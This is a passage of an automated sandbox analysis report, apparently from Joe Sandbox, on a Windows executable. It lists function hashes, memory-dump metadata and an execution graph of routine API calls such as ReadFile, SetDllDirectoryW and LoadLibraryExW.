                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE21B163A0C69181EB209F19D84427D73B1FB88B85F864139DB8D83AE4DF7CE985CB41
                                                                                                                                                                                                                                              Function 00007FF6B750FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction ID: 46f69375e5e0cb36e2d3d13817035f4875b358d53a28a2436d4d03ae55c646c2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D110A33618B8182EB618F19E84025977A5FB88B88F584234DB8D47764DF3DD5528700
                                                                                                                                                                                                                                              Function 00007FF6B752073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction ID: faa2155f1e93b51dfa73d5b32b26958f61afaba14c8c3fe0174856b584320da4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1301A223A1C20386F730AF68946127E23A0EF48744F841036D74DC66B5EF3CE5458F24

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:2.9%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:1.2%
                                                                                                                                                                                                                                              Total number of Nodes:812
                                                                                                                                                                                                                                              Total number of Limit Nodes:45
                                                                                                                                                                                                                                              execution_graph 87830 7ffe0077fd40 87831 7ffe0077fd50 87830->87831 87832 7ffe0077fd62 87831->87832 87836 7ffe007614bf 87831->87836 87840 7ffe007bf070 87831->87840 87844 7ffe00761df7 87831->87844 87836->87832 87837 7ffe007be960 87836->87837 87838 7ffe007bf1c1 SetLastError 87837->87838 87839 7ffe007bf1d5 87837->87839 87838->87839 87839->87832 87841 7ffe007bf180 87840->87841 87842 7ffe007bf1c1 SetLastError 87841->87842 87843 7ffe007bf1d5 87841->87843 87842->87843 87843->87832 87844->87832 87845 7ffe007beaa0 87844->87845 87846 7ffe007bf1c1 SetLastError 87845->87846 87847 7ffe007bf1d5 87845->87847 87846->87847 87847->87832 87848 7ffe01385220 87850 7ffe01385258 87848->87850 87851 7ffe013852ae 87848->87851 87851->87850 87852 7ffe01384c70 87851->87852 87853 7ffe01384ce4 87852->87853 87854 7ffe01384ef4 00007FFE1A463010 87853->87854 87855 7ffe01384d5f 87853->87855 87856 7ffe01384f14 87853->87856 87854->87856 87855->87851 87857 7ffe01384fa5 00007FFE1A463010 87856->87857 87858 7ffe01384fba 87856->87858 87857->87858 87858->87855 87860 7ffe01323790 87858->87860 87863 7ffe013237c7 87860->87863 87861 7ffe01323829 87861->87858 87863->87861 87865 7ffe01323370 87863->87865 87871 7ffe01317270 00007FFE1A463010 00007FFE1A463010 ReadFile 00007FFE1A463010 87863->87871 87866 7ffe01323381 87865->87866 87869 7ffe013234a4 87866->87869 87872 7ffe0131a0d0 87866->87872 87868 7ffe013233a2 87868->87869 87878 7ffe01317270 00007FFE1A463010 00007FFE1A463010 ReadFile 00007FFE1A463010 87868->87878 87869->87863 87871->87863 87874 7ffe0131a0f2 87872->87874 87876 7ffe0131a125 87872->87876 87874->87868 87875 7ffe0131a15d 87875->87874 87883 7ffe01317270 00007FFE1A463010 00007FFE1A463010 ReadFile 00007FFE1A463010 87875->87883 87876->87874 87876->87875 87879 7ffe01318050 87876->87879 87878->87869 87880 7ffe0131807f 87879->87880 87881 7ffe0131809c 87880->87881 87884 7ffe0130d9e0 87880->87884 87881->87875 87883->87874 87885 7ffe0130da0d 87884->87885 87889 7ffe0130da5a 87884->87889 87886 7ffe0130da43 00007FFE1A463010 87885->87886 87887 7ffe0130da23 00007FFE1A463010 87885->87887 87886->87889 87890 7ffe0130da28 87887->87890 87888 7ffe0130da83 ReadFile 87888->87889 87888->87890 87889->87888 87889->87890 87890->87881 87891 7ff6b750cc3c 87912 7ff6b750ce0c 87891->87912 87894 7ff6b750cd88 88063 7ff6b750d12c 7 API calls 2 library calls 87894->88063 87895 7ff6b750cc58 __scrt_acquire_startup_lock 87897 7ff6b750cd92 87895->87897 87900 7ff6b750cc76 __scrt_release_startup_lock 87895->87900 88064 7ff6b750d12c 7 API calls 2 library calls 87897->88064 87899 7ff6b750cc9b 87900->87899 87902 7ff6b750cd21 87900->87902 88060 7ff6b7519b2c 45 API calls 87900->88060 87901 7ff6b750cd9d __CxxCallCatchBlock 87918 7ff6b750d274 87902->87918 87904 7ff6b750cd26 87921 7ff6b7501000 87904->87921 87909 7ff6b750cd49 87909->87901 88062 7ff6b750cf90 7 API calls 87909->88062 87911 7ff6b750cd60 87911->87899 87913 7ff6b750ce14 87912->87913 87914 7ff6b750ce20 __scrt_dllmain_crt_thread_attach 87913->87914 87915 7ff6b750cc50 87914->87915 87916 7ff6b750ce2d 87914->87916 87915->87894 87915->87895 87916->87915 88065 7ff6b750d888 7 API calls 2 library calls 87916->88065 88066 7ff6b752a4d0 87918->88066 87920 7ff6b750d28b GetStartupInfoW 87920->87904 87922 7ff6b7501009 87921->87922 88068 7ff6b7515484 87922->88068 87924 7ff6b75037fb 88075 7ff6b75036b0 87924->88075 87930 7ff6b750383c 88174 7ff6b7501c80 87930->88174 87931 7ff6b750391b 88179 7ff6b75045c0 87931->88179 87935 7ff6b750385b 88147 7ff6b7508830 87935->88147 87938 7ff6b750396a 88202 7ff6b7502710 54 API calls _log10_special 87938->88202 87940 7ff6b750388e 87948 7ff6b75038bb __vcrt_freefls 87940->87948 88178 7ff6b75089a0 40 API calls __vcrt_freefls 87940->88178 87942 7ff6b750395d 87943 7ff6b7503984 87942->87943 87944 7ff6b7503962 87942->87944 87946 7ff6b7501c80 49 API calls 87943->87946 88198 7ff6b751004c 87944->88198 87949 7ff6b75039a3 87946->87949 87950 7ff6b7508830 14 API calls 87948->87950 87957 7ff6b75038de __vcrt_freefls 87948->87957 87954 7ff6b7501950 115 API calls 87949->87954 87950->87957 87952 7ff6b7503a0b 88205 7ff6b75089a0 40 API calls __vcrt_freefls 87952->88205 87956 7ff6b75039ce 87954->87956 87955 7ff6b7503a17 88206 7ff6b75089a0 40 API calls __vcrt_freefls 87955->88206 87956->87935 87959 7ff6b75039de 87956->87959 87963 7ff6b750390e __vcrt_freefls 87957->87963 88204 7ff6b7508940 40 API calls __vcrt_freefls 87957->88204 88203 7ff6b7502710 54 API calls _log10_special 87959->88203 87960 7ff6b7503a23 88207 7ff6b75089a0 40 API calls __vcrt_freefls 87960->88207 87964 7ff6b7508830 14 API calls 87963->87964 87965 7ff6b7503a3b 87964->87965 87966 7ff6b7503b2f 87965->87966 87967 7ff6b7503a60 __vcrt_freefls 87965->87967 88209 7ff6b7502710 54 API calls _log10_special 87966->88209 87980 7ff6b7503aab 87967->87980 88208 7ff6b7508940 40 API calls __vcrt_freefls 87967->88208 87970 7ff6b7508830 14 API calls 87971 7ff6b7503bf4 __vcrt_freefls 87970->87971 87972 7ff6b7503d41 87971->87972 87973 7ff6b7503c46 87971->87973 88223 7ff6b75044e0 49 API calls 87972->88223 87974 7ff6b7503cd4 87973->87974 87975 7ff6b7503c50 87973->87975 87977 7ff6b7508830 14 API calls 87974->87977 88210 7ff6b75090e0 59 API calls _log10_special 87975->88210 87984 7ff6b7503ce0 87977->87984 87979 7ff6b7503d4f 87982 7ff6b7503d65 87979->87982 87983 7ff6b7503d71 87979->87983 87980->87970 87981 7ff6b7503c55 87985 7ff6b7503c61 87981->87985 87986 7ff6b7503cb3 87981->87986 88224 7ff6b7504630 87982->88224 87988 7ff6b7501c80 49 API calls 87983->87988 87984->87985 87989 7ff6b7503ced 87984->87989 88211 7ff6b7502710 54 API calls _log10_special 87985->88211 88221 7ff6b7508660 86 API calls 2 library calls 87986->88221 88001 7ff6b7503d2b __vcrt_freefls 87988->88001 87991 7ff6b7501c80 49 API calls 87989->87991 87997 7ff6b7503d0b 87991->87997 87993 7ff6b7503dc4 88160 7ff6b7509390 87993->88160 87994 7ff6b7503cbb 87995 7ff6b7503cbf 87994->87995 87996 7ff6b7503cc8 87994->87996 87995->87985 87996->88001 88000 7ff6b7503d12 87997->88000 87997->88001 87999 7ff6b7503dd7 SetDllDirectoryW 88005 7ff6b7503e0a 87999->88005 88008 7ff6b7503e5a 87999->88008 88222 7ff6b7502710 54 API calls _log10_special 88000->88222 88001->87993 88002 7ff6b7503da7 SetDllDirectoryW LoadLibraryExW 88001->88002 88002->87993 88007 7ff6b7508830 14 API calls 88005->88007 88006 7ff6b7503808 __vcrt_freefls 88212 7ff6b750c550 88006->88212 88017 7ff6b7503e16 __vcrt_freefls 88007->88017 88009 7ff6b7504008 88008->88009 88010 7ff6b7503f1b 88008->88010 88011 7ff6b7504035 88009->88011 88012 7ff6b7504012 PostMessageW GetMessageW 88009->88012 88235 7ff6b75033c0 121 API calls 2 library calls 88010->88235 88165 7ff6b7503360 88011->88165 88012->88011 88014 7ff6b7503f23 88014->88006 88015 7ff6b7503f2b 88014->88015 88236 7ff6b75090c0 LocalFree 88015->88236 88020 7ff6b7503ef2 88017->88020 88024 7ff6b7503e4e 88017->88024 88234 7ff6b7508940 40 API calls __vcrt_freefls 88020->88234 88024->88008 88227 7ff6b7506dc0 54 API calls _set_fmode 88024->88227 88027 7ff6b750404f 88238 7ff6b7506fc0 FreeLibrary 88027->88238 88032 7ff6b750405b 88033 7ff6b7503e6c 88228 7ff6b7507340 117 API calls 2 library calls 88033->88228 88037 7ff6b7503e81 88039 7ff6b7503e85 88037->88039 88041 7ff6b7503ea2 88037->88041 88229 7ff6b7506e00 120 API calls _log10_special 88037->88229 88039->88008 88232 7ff6b7502a50 54 API calls _log10_special 88039->88232 88041->88039 88230 7ff6b75071b0 125 API calls 88041->88230 88046 7ff6b7503ee0 88233 7ff6b7506fc0 FreeLibrary 88046->88233 88047 7ff6b7503eb7 88047->88039 88231 7ff6b75074f0 55 API calls 88047->88231 88060->87902 88061 7ff6b750d2b8 GetModuleHandleW 88061->87909 88062->87911 88063->87897 88064->87901 88065->87915 88067 7ff6b752a4c0 88066->88067 88067->87920 88067->88067 88071 7ff6b751f480 88068->88071 88069 7ff6b751f4d3 88239 7ff6b751a814 37 API calls 2 library calls 88069->88239 88071->88069 88072 7ff6b751f526 88071->88072 88240 7ff6b751f358 71 API calls _fread_nolock 88072->88240 88074 7ff6b751f4fc 88074->87924 88241 7ff6b750c850 88075->88241 88078 7ff6b7503710 88243 7ff6b7509280 FindFirstFileExW 88078->88243 88079 7ff6b75036eb GetLastError 88248 7ff6b7502c50 51 API calls _log10_special 88079->88248 88082 7ff6b7503706 88087 7ff6b750c550 _log10_special 8 API calls 88082->88087 88084 7ff6b7503723 88249 7ff6b7509300 CreateFileW GetFinalPathNameByHandleW CloseHandle 88084->88249 88085 7ff6b750377d 88251 7ff6b7509440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 88085->88251 88090 7ff6b75037b5 88087->88090 88089 7ff6b750378b 88089->88082 88252 7ff6b7502810 49 API calls _log10_special 88089->88252 88090->88006 88097 7ff6b7501950 88090->88097 88091 7ff6b7503730 88092 7ff6b7503734 88091->88092 88093 7ff6b750374c __vcrt_FlsAlloc 88091->88093 88250 7ff6b7502810 49 API calls _log10_special 88092->88250 88093->88085 88096 7ff6b7503745 88096->88082 88098 7ff6b75045c0 108 API calls 88097->88098 88099 7ff6b7501985 88098->88099 88100 7ff6b7501c43 88099->88100 88102 7ff6b7507f90 83 API calls 88099->88102 88101 7ff6b750c550 _log10_special 8 API calls 88100->88101 88103 7ff6b7501c5e 88101->88103 88104 7ff6b75019cb 88102->88104 88103->87930 88103->87931 88146 7ff6b7501a03 88104->88146 88253 7ff6b75106d4 88104->88253 88106 7ff6b751004c 74 API calls 88106->88100 88107 7ff6b75019e5 88108 7ff6b75019e9 88107->88108 88109 7ff6b7501a08 88107->88109 88260 7ff6b7514f08 11 API calls _set_fmode 88108->88260 88257 7ff6b751039c 88109->88257 88112 7ff6b75019ee 88261 7ff6b7502910 54 API calls _log10_special 88112->88261 88115 7ff6b7501a45 88120 7ff6b7501a5c 88115->88120 88121 7ff6b7501a7b 88115->88121 88116 7ff6b7501a26 88262 7ff6b7514f08 11 API calls _set_fmode 88116->88262 88118 7ff6b7501a2b 88263 7ff6b7502910 54 API calls _log10_special 88118->88263 88264 7ff6b7514f08 11 API calls _set_fmode 88120->88264 88122 7ff6b7501c80 49 API calls 88121->88122 88125 7ff6b7501a92 88122->88125 88124 7ff6b7501a61 88265 7ff6b7502910 54 API calls _log10_special 88124->88265 88127 7ff6b7501c80 49 API calls 88125->88127 88128 7ff6b7501add 88127->88128 88129 7ff6b75106d4 73 API calls 88128->88129 88130 7ff6b7501b01 88129->88130 88131 7ff6b7501b35 88130->88131 88132 7ff6b7501b16 88130->88132 88133 7ff6b751039c _fread_nolock 53 API calls 88131->88133 88266 7ff6b7514f08 11 API calls _set_fmode 88132->88266 88135 7ff6b7501b4a 88133->88135 88137 7ff6b7501b50 88135->88137 88138 7ff6b7501b6f 88135->88138 88136 7ff6b7501b1b 88267 7ff6b7502910 54 API calls _log10_special 88136->88267 88268 7ff6b7514f08 11 API calls _set_fmode 88137->88268 88270 7ff6b7510110 37 API calls 2 library calls 88138->88270 88142 7ff6b7501b55 88269 7ff6b7502910 54 API calls _log10_special 88142->88269 88143 7ff6b7501b89 88143->88146 88271 7ff6b7502710 54 API calls _log10_special 88143->88271 88146->88106 88148 7ff6b750883a 88147->88148 88149 7ff6b7509390 2 API calls 88148->88149 88150 7ff6b7508859 GetEnvironmentVariableW 88149->88150 88151 7ff6b7508876 ExpandEnvironmentStringsW 88150->88151 88152 7ff6b75088c2 88150->88152 88151->88152 88154 7ff6b7508898 88151->88154 88153 7ff6b750c550 _log10_special 8 API calls 88152->88153 88155 7ff6b75088d4 88153->88155 88301 7ff6b7509440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 88154->88301 88155->87940 88157 7ff6b75088aa 88158 7ff6b750c550 _log10_special 8 API calls 88157->88158 88159 7ff6b75088ba 88158->88159 88159->87940 88161 7ff6b75093b2 MultiByteToWideChar 88160->88161 88162 7ff6b75093d6 88160->88162 88161->88162 88164 7ff6b75093ec __vcrt_freefls 88161->88164 88163 7ff6b75093f3 MultiByteToWideChar 88162->88163 88162->88164 88163->88164 88164->87999 88302 7ff6b7506360 88165->88302 88168 7ff6b7503399 88237 7ff6b7503670 FreeLibrary 88168->88237 88170 7ff6b7503381 88170->88168 88370 7ff6b7506050 88170->88370 88172 7ff6b750338d 88172->88168 88379 7ff6b75061e0 54 API calls 88172->88379 88175 7ff6b7501ca5 88174->88175 88518 7ff6b7514984 88175->88518 88178->87948 88180 7ff6b75045cc 88179->88180 88181 7ff6b7509390 2 API calls 88180->88181 88182 7ff6b75045f4 88181->88182 88183 7ff6b7509390 2 API calls 88182->88183 88184 7ff6b7504607 88183->88184 88541 7ff6b7515f94 88184->88541 88187 7ff6b750c550 _log10_special 8 API calls 88188 7ff6b750392b 88187->88188 88188->87938 88189 7ff6b7507f90 88188->88189 88190 7ff6b7507fb4 88189->88190 88191 7ff6b75106d4 73 API calls 88190->88191 88194 7ff6b750808b __vcrt_freefls 88190->88194 88192 7ff6b7507fd0 88191->88192 88192->88194 88709 7ff6b75178c8 88192->88709 88194->87942 88195 7ff6b75106d4 73 API calls 88197 7ff6b7507fe5 88195->88197 88196 7ff6b751039c _fread_nolock 53 API calls 88196->88197 88197->88194 88197->88195 88197->88196 88199 7ff6b751007c 88198->88199 88725 7ff6b750fe28 88199->88725 88201 7ff6b7510095 88201->87938 88202->88006 88203->88006 88204->87952 88205->87955 88206->87960 88207->87963 88208->87980 88209->88006 88210->87981 88211->88006 88213 7ff6b750c559 88212->88213 88214 7ff6b750c8e0 IsProcessorFeaturePresent 88213->88214 88215 7ff6b7503ca7 88213->88215 88216 7ff6b750c8f8 88214->88216 88215->88061 88737 7ff6b750cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 88216->88737 88218 7ff6b750c90b 88738 7ff6b750c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 88218->88738 88221->87994 88222->88006 88223->87979 88225 7ff6b7501c80 49 API calls 88224->88225 88226 7ff6b7504660 88225->88226 88226->88001 88227->88033 88228->88037 88229->88041 88230->88047 88231->88039 88232->88046 88233->88008 88234->88008 88235->88014 88237->88027 88238->88032 88239->88074 88240->88074 88242 7ff6b75036bc GetModuleFileNameW 88241->88242 88242->88078 88242->88079 88244 7ff6b75092bf FindClose 88243->88244 88245 7ff6b75092d2 88243->88245 88244->88245 88246 7ff6b750c550 _log10_special 8 API calls 88245->88246 88247 7ff6b750371a 88246->88247 88247->88084 88247->88085 88248->88082 88249->88091 88250->88096 88251->88089 88252->88082 88254 7ff6b7510704 88253->88254 88272 7ff6b7510464 88254->88272 88256 7ff6b751071d 88256->88107 88285 7ff6b75103bc 88257->88285 88260->88112 88261->88146 88262->88118 88263->88146 88264->88124 88265->88146 88266->88136 88267->88146 88268->88142 88269->88146 88270->88143 88271->88146 88273 7ff6b75104ce 88272->88273 88274 7ff6b751048e 88272->88274 88273->88274 88275 7ff6b75104da 88273->88275 88284 7ff6b751a814 37 API calls 2 library calls 88274->88284 88283 7ff6b751546c EnterCriticalSection 88275->88283 88278 7ff6b75104df 88279 7ff6b75105e8 71 API calls 88278->88279 88280 7ff6b75104f1 88279->88280 88281 7ff6b7515478 _fread_nolock LeaveCriticalSection 88280->88281 88282 7ff6b75104b5 88281->88282 88282->88256 88284->88282 88286 7ff6b75103e6 88285->88286 88297 7ff6b7501a20 88285->88297 88287 7ff6b7510432 88286->88287 88289 7ff6b75103f5 __scrt_get_show_window_mode 88286->88289 88286->88297 88298 7ff6b751546c EnterCriticalSection 88287->88298 88299 7ff6b7514f08 11 API calls _set_fmode 88289->88299 88291 7ff6b751043a 88293 7ff6b751013c _fread_nolock 51 API calls 88291->88293 88292 7ff6b751040a 88300 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 88292->88300 88295 7ff6b7510451 88293->88295 88296 7ff6b7515478 _fread_nolock LeaveCriticalSection 88295->88296 88296->88297 88297->88115 88297->88116 88299->88292 88300->88297 88301->88157 88303 7ff6b7506375 88302->88303 88304 7ff6b7501c80 49 API calls 88303->88304 88305 7ff6b75063b1 88304->88305 88306 7ff6b75063dd 88305->88306 88307 7ff6b75063ba 88305->88307 88309 7ff6b7504630 49 API calls 88306->88309 88390 7ff6b7502710 54 API calls _log10_special 88307->88390 88310 7ff6b75063f5 88309->88310 88311 7ff6b7506413 88310->88311 88391 7ff6b7502710 54 API calls _log10_special 88310->88391 88380 7ff6b7504560 88311->88380 88312 7ff6b750c550 _log10_special 8 API calls 88315 7ff6b750336e 88312->88315 88315->88168 88333 7ff6b7506500 88315->88333 88317 7ff6b750642b 88319 7ff6b7504630 49 API calls 88317->88319 88318 7ff6b7508e80 3 API calls 88318->88317 88320 7ff6b7506444 88319->88320 88321 7ff6b7506469 88320->88321 88322 7ff6b7506449 88320->88322 88386 7ff6b7508e80 88321->88386 88392 7ff6b7502710 54 API calls _log10_special 88322->88392 88325 7ff6b75063d3 88325->88312 88326 7ff6b7506476 88327 7ff6b7506482 88326->88327 88328 7ff6b75064c1 88326->88328 88330 7ff6b7509390 2 API calls 88327->88330 88394 7ff6b7505830 137 API calls 88328->88394 88331 7ff6b750649a GetLastError 88330->88331 88393 7ff6b7502c50 51 API calls _log10_special 88331->88393 88395 7ff6b7505400 88333->88395 88335 7ff6b7506526 88336 7ff6b750653f 88335->88336 88337 7ff6b750652e 88335->88337 88402 7ff6b7504c90 88336->88402 88420 7ff6b7502710 54 API calls _log10_special 88337->88420 88341 7ff6b750655c 88345 7ff6b750656c 88341->88345 88347 7ff6b750657d 88341->88347 88342 7ff6b750654b 88421 7ff6b7502710 54 API calls _log10_special 88342->88421 88344 7ff6b750653a 88344->88170 88422 7ff6b7502710 54 API calls _log10_special 88345->88422 88348 7ff6b75065ad 88347->88348 88349 7ff6b750659c 88347->88349 88351 7ff6b75065cd 88348->88351 88352 7ff6b75065bc 88348->88352 88423 7ff6b7502710 54 API calls _log10_special 88349->88423 88406 7ff6b7504d50 88351->88406 88424 7ff6b7502710 54 API calls _log10_special 88352->88424 88356 7ff6b75065ed 88359 7ff6b750660d 88356->88359 88360 7ff6b75065fc 88356->88360 88357 7ff6b75065dc 88425 7ff6b7502710 54 API calls _log10_special 88357->88425 88362 7ff6b750661f 88359->88362 88364 7ff6b7506630 88359->88364 88426 7ff6b7502710 54 API calls _log10_special 88360->88426 88427 7ff6b7502710 54 API calls _log10_special 88362->88427 88367 7ff6b750665a 88364->88367 88428 7ff6b75172b0 73 API calls 88364->88428 88366 7ff6b7506648 88429 7ff6b75172b0 73 API calls 88366->88429 88367->88344 88430 7ff6b7502710 54 API calls _log10_special 88367->88430 88371 7ff6b7506070 88370->88371 88371->88371 88372 7ff6b7506099 88371->88372 88377 7ff6b75060b0 __vcrt_freefls 88371->88377 88462 7ff6b7502710 54 API calls _log10_special 88372->88462 88374 7ff6b75060a5 88374->88172 88375 7ff6b75061bb 88375->88172 88377->88375 88378 7ff6b7502710 54 API calls 88377->88378 88432 7ff6b7501470 88377->88432 88378->88377 88379->88168 88381 7ff6b750456a 88380->88381 88382 7ff6b7509390 2 API calls 88381->88382 88383 7ff6b750458f 88382->88383 88384 7ff6b750c550 _log10_special 8 API calls 88383->88384 88385 7ff6b75045b7 88384->88385 88385->88317 88385->88318 88387 7ff6b7509390 2 API calls 88386->88387 88388 7ff6b7508e94 LoadLibraryExW 88387->88388 88389 7ff6b7508eb3 __vcrt_freefls 88388->88389 88389->88326 88390->88325 88391->88311 88392->88325 88393->88325 88394->88325 88398 7ff6b750542c 88395->88398 88396 7ff6b7505434 88396->88335 88397 7ff6b75055d4 88399 7ff6b7505797 __vcrt_freefls 88397->88399 88400 7ff6b75047d0 47 API calls 88397->88400 88398->88396 88398->88397 88431 7ff6b7516aa4 48 API calls 88398->88431 88399->88335 88400->88397 88403 7ff6b7504cc0 88402->88403 88404 7ff6b750c550 _log10_special 8 API calls 88403->88404 88405 7ff6b7504d2a 88404->88405 88405->88341 88405->88342 88407 7ff6b7504d65 88406->88407 88408 7ff6b7501c80 49 API calls 88407->88408 88409 7ff6b7504db1 88408->88409 88410 7ff6b7501c80 49 API calls 88409->88410 88419 7ff6b7504e33 __vcrt_freefls 88409->88419 88411 7ff6b7504df0 88410->88411 88414 7ff6b7509390 2 API calls 88411->88414 88411->88419 88412 7ff6b750c550 _log10_special 8 API calls 88413 7ff6b7504e7e 88412->88413 88413->88356 88413->88357 88415 7ff6b7504e06 88414->88415 88416 7ff6b7509390 2 API calls 88415->88416 88417 7ff6b7504e1d 88416->88417 88418 7ff6b7509390 2 API calls 88417->88418 88418->88419 88419->88412 88420->88344 88421->88344 88422->88344 88423->88344 88424->88344 88425->88344 88426->88344 88427->88344 88428->88366 88429->88367 88430->88344 88431->88398 88433 7ff6b75045c0 108 API calls 88432->88433 88434 7ff6b7501493 88433->88434 88435 7ff6b75014bc 88434->88435 88436 7ff6b750149b 88434->88436 88438 7ff6b75106d4 73 API calls 88435->88438 88485 7ff6b7502710 54 API calls _log10_special 88436->88485 88440 7ff6b75014d1 88438->88440 88439 7ff6b75014ab 88439->88377 88441 7ff6b75014d5 88440->88441 88442 7ff6b75014f8 88440->88442 88486 7ff6b7514f08 11 API calls _set_fmode 88441->88486 88445 7ff6b7501532 88442->88445 88446 7ff6b7501508 88442->88446 88444 7ff6b75014da 88487 7ff6b7502910 54 API calls _log10_special 88444->88487 88449 7ff6b7501538 88445->88449 88454 7ff6b750154b 88445->88454 88488 7ff6b7514f08 11 API calls _set_fmode 88446->88488 88463 7ff6b7501210 88449->88463 88450 7ff6b7501510 88489 7ff6b7502910 54 API calls _log10_special 88450->88489 88453 7ff6b751004c 74 API calls 88455 7ff6b75015c4 88453->88455 88456 7ff6b751039c _fread_nolock 53 API calls 88454->88456 88457 7ff6b75015d6 88454->88457 88461 7ff6b75014f3 __vcrt_freefls 88454->88461 88455->88377 88456->88454 88490 7ff6b7514f08 11 API calls _set_fmode 88457->88490 88459 7ff6b75015db 88491 7ff6b7502910 54 API calls _log10_special 88459->88491 88461->88453 88462->88374 88464 7ff6b7501268 88463->88464 88465 7ff6b750126f 88464->88465 88466 7ff6b7501297 88464->88466 88496 7ff6b7502710 54 API calls _log10_special 88465->88496 88469 7ff6b75012d4 88466->88469 88470 7ff6b75012b1 88466->88470 88468 7ff6b7501282 88468->88461 88474 7ff6b75012e6 88469->88474 88484 7ff6b7501309 memcpy_s 88469->88484 88497 7ff6b7514f08 11 API calls _set_fmode 88470->88497 88472 7ff6b75012b6 88498 7ff6b7502910 54 API calls _log10_special 88472->88498 88499 7ff6b7514f08 11 API calls _set_fmode 88474->88499 88476 7ff6b75012eb 88500 7ff6b7502910 54 API calls _log10_special 88476->88500 88477 7ff6b751039c _fread_nolock 53 API calls 88477->88484 88479 7ff6b7510110 37 API calls 88479->88484 88480 7ff6b75012cf __vcrt_freefls 88480->88461 88481 7ff6b75013cf 88501 7ff6b7502710 54 API calls _log10_special 88481->88501 88484->88477 88484->88479 88484->88480 88484->88481 88492 7ff6b7510adc 88484->88492 88485->88439 88486->88444 88487->88461 88488->88450 88489->88461 88490->88459 88491->88461 88493 7ff6b7510b0c 88492->88493 88502 7ff6b751082c 88493->88502 88495 7ff6b7510b2a 88495->88484 88496->88468 88497->88472 88498->88480 88499->88476 88500->88480 88501->88480 88503 7ff6b7510879 88502->88503 88504 7ff6b751084c 88502->88504 88503->88495 88504->88503 88505 7ff6b7510856 88504->88505 88506 7ff6b7510881 88504->88506 88516 7ff6b751a814 37 API calls 2 library calls 88505->88516 88509 7ff6b751076c 88506->88509 88517 7ff6b751546c EnterCriticalSection 88509->88517 88511 7ff6b7510789 88512 7ff6b75107ac 74 API calls 88511->88512 88513 7ff6b7510792 88512->88513 88514 7ff6b7515478 _fread_nolock LeaveCriticalSection 88513->88514 88515 7ff6b751079d 88514->88515 88515->88503 88516->88503 88520 7ff6b75149de 88518->88520 88519 7ff6b7514a03 88536 7ff6b751a814 37 API calls 2 library calls 88519->88536 88520->88519 88522 7ff6b7514a3f 88520->88522 88537 7ff6b7512c10 49 API calls 